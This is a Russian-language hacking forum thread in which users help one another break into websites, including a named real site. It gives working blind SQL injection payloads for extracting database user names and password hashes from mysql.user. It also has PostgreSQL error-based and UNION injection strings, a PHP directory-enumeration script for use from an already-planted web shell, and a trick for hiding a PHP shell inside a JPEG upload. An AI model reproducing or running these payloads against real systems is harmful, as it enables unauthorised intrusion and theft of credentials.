собстно нет. http://sk-kr.ru/index.php?id=2 Здесб баг в самом скрипте, вы не вызываете ошибку, она вызвана каким то драгим фактором.
Нету в модексе скулей. Точнее есть, но как-бэ нет Во всяком случае в последнем. В этих параметрах можешь даже и не пробовать
спасибо, покопаюсь дальше, надеюсь найду тайную дверцу в чрево сайта... ведь я правильно понял : Точнее есть, но как-бэ нет что дырка есть но не в этом параметре, теперь буду пробовать из спортивного интереса.
В таком случае рекоммендую скачать код. Просто так, удалённо замучаешься и врятли найдёшь. Хотя эта версия не последняя, про неё точно сказать не могу
Провожу blind инъекцию первый раз,вначале узнал имя юзера таким запросом http://site/printerfriendlynews.php?newsid=1631+AND+ascii(lowe r(substring(user(),1,1)))>1 b и так до его имени,теперь как узнать его пароль?
Если ветка >= 5 если есть доступ к mysql, то Code: SELECT password FROM mysql.user WHERE user=0x0000 где 0000 - имя твоего пользователя в хексе.
2Fed123, вашим запросом вы узнали текущего юзера базы данных. Пробуйте так: Code: www.site.com/index.php?id=1+AND+ascii(lower(substring((SELECT+user+from+user+LIMIT+1),1,1)))>1 Code: www.site.com/index.php?id=1+AND+ascii(lower(substring((SELECT+password+from+mysql.user+WHERE+user="ВАШ ЮЗЕР"+LIMIT+1),1,1)))>1 Ну и так далее перебирайте.
Вопрос такой,есть шелл необходимо спарсить название папок /юзер/папка/domain.com/ нужны название всех папок из путя,т.к у юзверей в разных папках домены лежат. реверс по айпи не катит там,сеть айпи висит. видел кто нить подобное? руками не вариант
PHP: <pre> <?php @set_time_limit(0); @ini_set("display_errors","1"); @ignore_user_abort(1); $l_folder = '/юзер/папка/domain.com'; // Полный абсолютный путь к папке //Функция рекурсивного получения списка файлов и папок function fold($rootDir, $allData=array()) { $invisibleFileNames = array(".", ".."); $dirContent = scandir($rootDir); foreach($dirContent as $key => $content) { $path = $rootDir.'/'.$content; if(!in_array($content, $invisibleFileNames)) { if(is_file($path) && is_readable($path)) { preg_match('|\/(.*)\/|',$path,$res); $allData[0][] = $path;//Файлы $allData[1][] = $res[0];//папки }elseif(is_dir($path) && is_readable($path)) { $allData = fold($path, $allData); } } } return $allData; } $b = fold($l_folder); print_r($b); ?> </pre>
Если есть возможно выполнять команды, тогда: Code: find /юзер/папка/domain.com/ -type d Если надо переходить по символическим ссылкам, тогда добавь -L Пример: Code: $ find -L /tmp -type d /tmp /tmp/launch-2sW0uR /tmp/launch-DM3FAL /tmp/launch-DSlIgu /tmp/launch-hrAmOc /tmp/launchd-229.B1EiU1 /tmp/ssh-yqYA4n2bZI
ATLANT_93 если ты хочешь присоединить троя или вирус, то джойнером. Но какое это отношение имеет к уязвимостям и данной теме?
Есть страница ***?id=1 Если я пытаюсь что-то дописать в ID (+, +--+, 2-1, /*) То получаю следующее: Code: Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: syntax error at or near "=" at character 642 in /var/www/html/dbms/trade.php on line 1099 Warning: pg_numrows(): supplied argument is not a valid PostgreSQL result resource in /var/www/html/dbms/trade.php on line 1101 Можно что-то из этого вытащить?
Судя по ошибке - есть вероятность инъекции. База данных - PostgreSQL Коментарий "/*" не прокатит, так как даный коментарий должен быть закрыт, используйте "--". Попробуйте вывесть системную информацию: Code: ***id=1+and+1=cast((SELECT+version()||chr(58)||current_user||chr(58)||current_database())+as+int)-- И подобрать количество полей: Есть возможность использования конструкции order by ***id=1+order+by+100-- Или ***id=1+union+select+null,null,null,null,null,null-- или: ***id=1+union+select+1,2,3,4,5,6--
Поясни пожалуйста, что это за хренотень, и от чего, по твоему, это должно помогать. ATLANT_93 По поводу шелла в картинке. 1 Метаданные 2 Просто переименовать расширение php файла 3 В конец файла Пролезет или нет зависит ТОЛЬКО от проверок при загрузке, и манипуляции с FF D9 мне не понятны. Gray_Wolf Линк давай в тему, это не клуб экстрасенсов
ага а $cat pic.jpg shell.php > poisoned.jpg это способ не знать про хекс эдитор. Гвозди можно забивать микроскопом, но зачем? Зачем делать магический ритуал из простой вещи? Конечно применить хекс-эдитор это мегахакерский ход. Двигать байты, делать при этом серьезное лицо, это круто.
